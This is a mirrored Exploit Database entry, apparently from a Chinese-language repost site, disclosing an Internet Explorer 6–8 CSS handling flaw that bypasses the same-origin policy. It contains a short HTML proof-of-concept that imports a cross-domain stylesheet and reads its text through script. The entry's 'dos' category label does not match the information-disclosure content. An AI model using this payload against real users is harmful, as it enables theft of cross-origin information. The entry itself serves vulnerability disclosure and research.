Microsoft Internet Explorer 7/8 – CSS Handling Cross Domain Information Disclosure

Exploit Database
15 阅读

作者： Chris Evans

日期： 2010-09-06
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/34602/

source: https://www.securityfocus.com/bid/42993/info

Microsoft Internet Explorer is prone to a cross-domain information-disclosure vulnerability because the application fails to enforce the same-origin policy.

An attacker can exploit this issue by enticing an unsuspecting user into viewing a page containing malicious content.

Successful exploits will allow attackers to bypass the same-origin policy and obtain potentially sensitive information; other attacks are possible.

This issue affects Internet Explorer 6, 7, and 8. 

<html> <head> <style> @import url("http://www.example.com/hi_heige"); </style> <script> function loaded() { alert(document.styleSheets(0).imports(0).cssText); } </script> </head> <body onload="loaded()"> </body> </html>

last Exploits
Microsoft Internet Explorer 7/8 – CSS Handling Cross Domain Information Disclosure的更多信息

Microsoft Windows – ‘nt!KiDispatchException’ Kernel Stack Memory Disclosure in Exception Handling：
iPhone FTP Server (WiFi FTP) by SavySoda – Denial of Service (PoC)：
PHP 5.5.37/5.6.23/7.0.8 – ‘bzread()’ Out-of-Bounds Write：
Sync Breeze Enterprise 10.0.28 – Denial of-Service (PoC)：
Google Chrome < 14.0.835.163 - '.pdf' File Handling Memory Corruption：
Corel VideoStudio Pro X3 – ‘.mp4’ Buffer Overflow：
Tembria Server Monitor 5.6.0 – Denial of Service：
Avira AntiVir – ‘.QUA’ File ‘avcenter.exe’ Local Crash (PoC)：